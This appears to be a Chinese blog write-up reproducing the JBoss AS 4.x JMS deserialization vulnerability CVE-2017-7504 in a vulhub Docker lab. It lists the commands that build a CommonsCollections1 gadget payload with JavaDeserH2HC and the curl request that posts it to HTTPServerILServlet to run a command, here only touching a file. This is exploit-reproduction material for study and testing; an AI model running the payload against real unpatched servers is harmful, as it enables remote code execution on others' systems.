jboss反序列化漏洞复现(CVE-2017-7504)
jboss反序列化漏洞复现(CVE-2017-7504)
一、漏洞描述
Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
二、漏洞环境搭建以及复现
1、使用docker搭建漏洞环境及复现
Docker-compose build
docker-compose up -d
2、浏览器访问http://172.17.0.1:8080/,测试环境是否搭建成功
3、下载测试工具, 下载地址:https://github.com/joaomatosf/JavaDeserH2HC
我们选择一个Gadget:ExampleCommonsCollections1WithHashMap,编译并生成序列化数据:
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
可见,我们执行的命令是touch /tmp/success。执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser
4、将该文件作为body发送如下数据包:
curl http://172.17.0.1:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser
5、验证是否成功,在docker环境中执行docker-compose exec jboss bash,下图可以看到成功创建了success文件,说明漏洞存在
-------------------------------------------------------------------------------------------------
参考: https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-7504
最新文章
- h5视频上传之前端视频压缩研究
- Lua 之table库
- Android Studio 经常使用功能介绍
- CodeForces 705A(训练水题)
- 《Pro Git》笔记3:分支基本操作
- Netsharp快速入门(之2) 基础档案(之A 创建插件和资源)
- Tips for android
- PHP strlen() 函数
- MVC View基础
- codeforces Round #347 (Div. 2) C - International Olympiad
- 最火的Android开源项目(二)
- asp.net中过滤器的两种写法
- Codeforces Round #FF (Div. 2):C. DZY Loves Sequences
- 进程、线程、轻量级进程、协程和go中的Goroutine
- 解决运行pytorch程序多线程问题
- VMware Workstation 常见问题解决
- wpf揭秘
- ThinkPHP5 <= 5.0.22 远程代码执行高危漏洞
- zookeeper单机版安装
- pms前端结构